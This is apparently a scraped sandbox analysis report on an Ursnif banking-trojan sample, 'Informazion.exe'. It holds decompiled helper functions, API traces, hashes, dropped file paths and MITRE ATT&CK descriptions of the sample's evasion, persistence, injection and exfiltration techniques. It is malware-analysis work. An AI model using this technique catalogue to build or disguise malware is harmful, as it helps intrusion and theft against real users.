Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 3626b379c720a7459d892a7153ccf8800853cefabd70fa1154471b309bac8be2
Instruction ID: 9050146e1710c9f8a0e8a584a1f9d2a6d06e1503f1a1ab3c4f3af37acfc6446c
Opcode Fuzzy Hash: 3626b379c720a7459d892a7153ccf8800853cefabd70fa1154471b309bac8be2
Instruction Fuzzy Hash: AA21D572500256EFCF125F7ADC68AAE7FF8AF69240B048055F9859B201E635C901EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01091E85 Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01091E85(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E01096A51(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x01091e9a
0x01091e9e
0x01091ea8
0x01091ead
0x01091eb2
0x01091eb4
0x01091ebc
0x01091ec1
0x01091ecf
0x01091ed4
0x01091ede

APIs

lstrlenW.KERNEL32(004F0053,?,74715520,00000008,01B093CC,?,01095EE8,004F0053,01B093CC,?,?,?,?,?,?,01094974), ref: 01091E95
lstrlenW.KERNEL32(01095EE8,?,01095EE8,004F0053,01B093CC,?,?,?,?,?,?,01094974), ref: 01091E9C

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

memcpy.NTDLL(00000000,004F0053,747169A0,?,?,01095EE8,004F0053,01B093CC,?,?,?,?,?,?,01094974), ref: 01091EBC
memcpy.NTDLL(747169A0,01095EE8,00000002,00000000,004F0053,747169A0,?,?,01095EE8,004F0053,01B093CC), ref: 01091ECF

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: ec6a70f5bd9aae4872eb5a2a67525a41013324f0ae3fdafb59300a4adc038e45
Instruction ID: ced5ecc08831e8a23390ee85810ace76bc76cd34fac4e97a16722560d64ca7e6
Opcode Fuzzy Hash: ec6a70f5bd9aae4872eb5a2a67525a41013324f0ae3fdafb59300a4adc038e45
Instruction Fuzzy Hash: 9BF0FF76900119FB8F11DFA9CC84CDF7BACEF592547158066FE08D7111E636EA14ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 010911A3 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(01B09BD0,00000000,00000000,00000000,01093879,00000000), ref: 010911B3
lstrlen.KERNEL32(?), ref: 010911BB

Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D

lstrcpy.KERNEL32(00000000,01B09BD0), ref: 010911CF
lstrcat.KERNEL32(00000000,?), ref: 010911DA

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: ded5d63ae578844f954d73775a733aac3a4a770bdee79d1c8491baed7aba79e7
Instruction ID: 86ce359da9e08bc4b9b7f2c3966dfcd78d40e8dfcdb72c13aeedaf12dcbb18ee
Opcode Fuzzy Hash: ded5d63ae578844f954d73775a733aac3a4a770bdee79d1c8491baed7aba79e7
Instruction Fuzzy Hash: DEE09273601621AB8F219BE8AC58C6FBBACFFD9660304441AFA50D3104C73A98019BA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Informazion.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\maintainabovl.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnvs1j2f.0ik.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wavrmkab.sfm.ps1

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
Informazion.exe

Function 00007FF64C5140C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371
libraryloaderCOMMONCrypto

Function 00007FF64C511D28 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 183
registrylibrarymemoryCOMMONCrypto

Function 00007FF64C511684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350
memoryCOMMON

Function 00007FF64C5166C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299
memorystringCOMMONCrypto

Function 00007FF64C516CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215
windowCOMMONCrypto

Function 00007FF64C515D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124
windowCOMMON

Function 00007FF64C5130EC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151
libraryfileloaderCOMMON

Function 00007FF64C5164E4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123
COMMON

Function 00007FF64C512C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
libraryloadershutdownCOMMON

Function 00007FF64C51204C Relevance: 12.1, APIs: 8, Instructions: 119
filestringCOMMON

Function 00007FF64C5161EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97
registryfileCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre